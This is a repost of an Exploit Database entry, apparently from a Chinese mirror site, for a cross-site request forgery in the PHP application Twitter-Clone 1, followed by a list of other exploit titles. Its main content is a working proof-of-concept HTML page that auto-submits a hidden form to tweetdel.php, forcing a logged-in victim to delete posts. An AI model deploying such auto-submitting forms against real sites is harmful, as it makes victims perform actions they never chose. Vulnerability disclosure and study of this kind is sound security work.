Twitter-Clone 1 – Cross-Site Request Forgery (Delete Post)

Exploit Database
13 阅读

作者： L0RD

日期： 2018-08-21
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/45232/

# Exploit Title: Twitter-Clone 1 - Cross-Site Request Forgery (Delete Post)
# Date: 2018-08-21
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
# Version: 1
# CVE: N/A
# Tested on: Win 10

# Description :
# An issue was discovered in Twitter-Clone 1 which allows a remote
# attacker to force any victim to delete posts.

# POC :
# Delete posts exploit :

<html>
<head>
 <title>POC</title>
</head>
<body>
<form action='http://127.0.0.1/clone/twitter-clone/tweetdel.php?id="set
tweet id here of any post' method='post'>
<input type='hidden' name='id' value='set tweet id here of any post' />
</form>
 <script>
document.forms[0].submit();
 </script>
</body>
</html>

last Exploits
Twitter-Clone 1 – Cross-Site Request Forgery (Delete Post)的更多信息

phpMyAdmin 3.x – Swekey Remote Code Injection：
Mirage – SQL Injection：
ownCloud 10.3.0 stable – Cross-Site Request Forgery：
SportsPHool 1.0 – Remote File Inclusion：
WordPress Plugin Bulk Delete Users by Email 1.0 – Cross-Site Request Forgery：
Netgear R7000 Router – Remote Code Execution：
Tenda W3002R/A302/w309r Wireless Router v5.07.64_en – Remote DNS Change (PoC)：
Progress OpenEdge 11.2 – Directory Traversal：